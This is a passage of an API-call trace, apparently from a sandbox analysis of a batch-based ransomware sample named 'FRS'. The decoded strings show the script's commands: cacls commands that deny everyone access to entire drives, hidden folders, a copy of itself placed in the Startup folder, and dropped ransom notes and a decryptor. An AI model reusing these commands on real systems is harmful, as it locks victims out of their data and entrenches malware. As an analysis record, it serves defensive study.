lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0091.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0091.560] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.560] GetFileType (hFile=0x2a0) returned 0x1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0091.560] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0091.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0091.560] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.560] GetFileType (hFile=0x2a0) returned 0x1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0091.560] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0091.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0091.560] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.560] GetFileType (hFile=0x2a0) returned 0x1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0091.560] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0091.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0091.560] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.560] GetFileType (hFile=0x2a0) returned 0x1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0091.561] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0091.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0091.561] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.561] GetFileType (hFile=0x2a0) returned 0x1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0091.561] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0091.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0091.561] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.561] GetFileType (hFile=0x2a0) returned 0x1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0091.561] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0091.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0091.561] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.561] GetFileType (hFile=0x2a0) returned 0x1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0091.561] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0091.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0091.561] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.561] GetFileType (hFile=0x2a0) returned 0x1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0091.561] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.561] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0091.562] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0091.562] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.562] GetFileType (hFile=0x2a0) returned 0x1 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0091.562] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0091.562] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0091.562] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.562] GetFileType (hFile=0x2a0) returned 0x1 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0091.562] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0091.562] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0091.562] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.562] GetFileType (hFile=0x2a0) returned 0x1 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0091.562] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0091.562] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0091.562] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.562] GetFileType (hFile=0x2a0) returned 0x1 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0091.562] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0091.562] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0091.562] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0091.563] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.563] GetFileType (hFile=0x2a0) returned 0x1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0091.563] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0091.563] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0091.563] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.563] GetFileType (hFile=0x2a0) returned 0x1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0091.563] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0091.563] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0091.563] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.563] GetFileType (hFile=0x2a0) returned 0x1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0091.563] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0091.563] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0091.563] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.563] GetFileType (hFile=0x2a0) returned 0x1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0091.563] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0091.563] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0091.563] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.563] GetFileType (hFile=0x2a0) returned 0x1 [0091.563] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0091.564] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0091.564] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0091.564] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.564] GetFileType (hFile=0x2a0) returned 0x1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0091.564] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0091.564] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0091.564] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.564] GetFileType (hFile=0x2a0) returned 0x1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0091.564] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0091.564] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0091.564] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.564] GetFileType (hFile=0x2a0) returned 0x1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0091.564] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0091.564] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0091.564] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.564] GetFileType (hFile=0x2a0) returned 0x1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0091.564] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0091.564] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0091.565] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0091.565] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.565] GetFileType (hFile=0x2a0) returned 0x1 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0091.565] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0091.565] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0091.565] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.565] GetFileType (hFile=0x2a0) returned 0x1 [0091.565] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0091.565] ReadFile (in: hFile=0x2a0, 